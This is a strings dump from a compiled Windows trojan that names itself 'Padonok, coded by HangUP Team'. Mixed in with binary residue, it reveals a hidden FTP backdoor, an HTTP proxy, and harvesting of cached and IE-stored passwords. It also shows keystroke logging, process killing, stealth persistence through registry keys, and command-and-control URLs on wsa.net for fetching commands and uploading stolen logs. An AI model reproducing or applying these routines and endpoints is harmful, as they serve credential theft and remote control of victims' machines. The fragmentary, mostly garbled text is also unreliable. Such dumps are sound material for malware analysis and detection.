t ;t$$t SVWUj ]_^[ SVWU t}VU =G;= _^[] (SVW ;G;} QPSVW _^[] _^[] FVhA QSVW CA_^[ wxj\W wxj\W wxjZW QSVW PhQ+@ QPSV hivA hsvA u[hkzA <>\t lSVW Ph~f <0:u2j Sh|N@ Ph~f T_^[ QPVW <>\u _^[] QPSVWj QSVWj SVWf ,SVW 3U{B -HZ@ 3U{B 3U{B @_^[ \tQWh^ 8/u,j ?/u+j tLh( 8/u,j >.uz >/u @Ph* =USER [=CWD !=PWD =MKD =TYPE =DELE =SIZE =PORTt\ -=RETR =STOR =PASS =LIST =REST =SYST QSVW Whds@ $SVWh _^[] 3F;u PShv PShv SVW1 QPSVW _^[] SVWh _^[ ?"u#j" PDK_11 CRYPTKEY ntdll.dll RtlInitUnicodeString NtUnmapViewOfSection NtOpenSection NtMapViewOfSection RtlNtStatusToDosError CURRENT_USER CRYPTEND PADONOK 0SVW =.kwmt =.KWMt _^[ PWjJS CRYPTKEY Process32Next NtQuerySystemInformation CreateFileA kernel32.dll ntdll.dll kernel32.dll ntdll.dll wsock32.dll kernel32.dll kernel32.dll user32.dll user32.dll kernel32.dll wcscmp htons VirtualProtect GetCurrentProcessId FindWindowA SendMessageA IsBadReadPtr kernel32.dll CRYPTEND HTTP/1.0 200 Connection established !This program cannot be run in DOS mode. .text `.rdata @.data .idata .reloc .edata t ;t$$t SVWUj ]_^[ SVWU t}VU t(x4 ]_^[ @_^[ abcdefghijklmno %s\%s Padonok, coded by HangUP Team ExitProcess GetEnvironmentStringsA CloseHandle GetSystemDirectoryA OpenMutexA RtlUnwind WinExec _fdopen _open_osfhandle fclose _cexit malloc printf raise setbuf sprintf strcpy KERNEL32.DLL CRTDLL.DLL 2$2*2?2 3*464B4N4Z4f4r4~4 2 2$2(2,20242D2H2L2P2T2X2\2`2d2h2 tdll.dll _fuck )139 jtu| 3U{B RegisterServiceProcess kernel32.dll alive %s-%s Software\Microsoft\IE4 http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch about:blank http://www.wsa.net/scr/wcmd.txt http://www.wsa.net/scr/ppslog.php http://www.wsa.net/scr/piplog.php?%s:%i:%i:%s:%09u:%i:%02d:%02d:%02d PADONOK %s\%s.exe Software Padonok32.dat Search Page Start Page %s/Rtdx1%i.htm %s\Rtdx1%i.dat wupd %s /C %s \command.com %s\command.pif \cmd.exe %s\cmd.pif :%02u Padonok32.vxd http:// %s\%s %s\*.wmk %s%u X-okRecv11 %s%u - Microsoft Internet Explorer \Iexplore.exe Path Software\Microsoft\IE Setup\Setup GlobalUserOffline Software\Microsoft\Windows\CurrentVersion\Internet Settings 1601 SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u %s
%s
xIEPo$ter %s%u
.htm %s%c%c command.com cmd.exe can`t kill. killed. Process %X %s ERROR: Bad PID! !kprc !prcl exit %s%02i %X %s N PID NAME Process32Next Process32First CreateToolhelp32Snapshot KERNEL32.DLL 500 P-Error 200 BINARY p 200 ASCII p 215 UNIX Type: L8 230 P-Ok 331 P-Psw? 250 "%s" cd 200 P-po 220 Hello padonok! %s%s\ %crwxrwxrwx 1 noone nogroup %i %s %02i %02i:%02i %s total 65535 %s*.* 150 ASCII p 226 P-ok 150 BINARY p 501 P-E 250 DELE 257 "%s" c 213 %i 550 P-E %s%s WWW. HTTP:// IEFrame Web Event Logger Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Apartment ThreadingModel CLSID\%s\InProcServer32 %s\%s.dll {79FB9088-19CE-715D-D85A-216290C5B738} HTTP/1.0 400 Malformed Request Pragma: no-cache Content-type: text/html Error400

Error300: Browser sent malformed request HTTP/1.0 404 Host Not Found Pragma: no-cache Content-type: text/html Error404

Error404: Hostname DNS lookup failed CONTENT-LENGTH: 200 OK HTTP/1 %s %s CONNECT Cache-Control: Proxy- GET http:// HTTP/1. HTTP:// %s\%s#K%u-%u-%u#%u-%u-%u.wmk %s\%s#D%u-%u-%u#%u-%u-%u.wmk FormSuggest PW Ask FormSuggest Passwords Use FormSuggest SOFTWARE\Microsoft\Internet Explorer\Main AutoSuggest SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoComplete BUTTON #32770 WNetEnumCachedPasswords MPR.DLL %s:%s [%s] '%s' [%s] %s Internet Explorer PStoreCreateInstance pstorec.dll WSAGetLastError WSAStartup __WSAFDIsSet accept bind closesocket connect gethostbyname htonl htons inet_addr ioctlsocket listen recv select send socket CoTaskMemFree DeleteUrlCacheEntry FindFirstUrlCacheEntryA FindNextUrlCacheEntryA ExitProcess ExitThread ExpandEnvironmentStringsA FileTimeToLocalFileTime FileTimeToSystemTime FindClose FindFirstFileA FindNextFileA FreeLibrary GetCommandLineA GetCurrentProcessId GetExitCodeProcess GetExitCodeThread GetFileAttributesA GetFileSize GetFileTime GetLocalTime GetModuleFileNameA GetModuleHandleA CloseHandle GetProcAddress GetSystemDirectoryA GetTempPathA GetTickCount GetTimeZoneInformation GetVersion GetVersionExA GetWindowsDirectoryA GlobalLock GlobalMemoryStatus CopyFileA GlobalUnlock InterlockedIncrement IsBadReadPtr IsBadWritePtr LoadLibraryA CreateDirectoryA LocalAlloc LocalFree OpenFile OpenMutexA OpenProcess PeekNamedPipe CreateFileA ReadFile ReadProcessMemory RemoveDirectoryA RtlUnwind SetEndOfFile SetFileAttributesA SetFilePointer CreateMutexA Sleep TerminateProcess TerminateThread CreatePipe VirtualQuery CreateProcessA WaitForSingleObject WinExec WriteFile lstrlenA lstrlenW CreateThread DeleteFileA GetWindowTextA GetWindowRect FindWindowA GetWindow IsWindowVisible GetClassNameA OpenClipboard CloseClipboard EmptyClipboard GetClipboardData GetForegroundWindow LoadCursorA SetTimer KillTimer RegisterClassA GetMessageA TranslateMessage DispatchMessageA SendMessageA CharUpperBuffA OemToCharA PostQuitMessage ShowWindow CreateWindowExA DestroyWindow DefWindowProcA GetStockObject DeleteObject RegCreateKeyExA RegCloseKey RegOpenKeyExA RegQueryValueExA RegSetValueExA GetSecurityInfo SetSecurityInfo SetEntriesInAclA _itoa __GetMainArgs _sleep _strcmpi _stricmp atoi exit memcpy memset raise rand signal sprintf srand sscanf strcat strchr strcmp wsock32.dll ole32.DLL WININET.DLL KERNEL32.DLL USER32.DLL GDI32.DLL ADVAPI32.DLL CRTDLL.DLL CRTDLL.dll _itoa __GetMainArgs _sleep _strcmpi _strcmpi atoi exit memcpy memset raise rand signal sprintf srand sscanf strcat strchr strcmp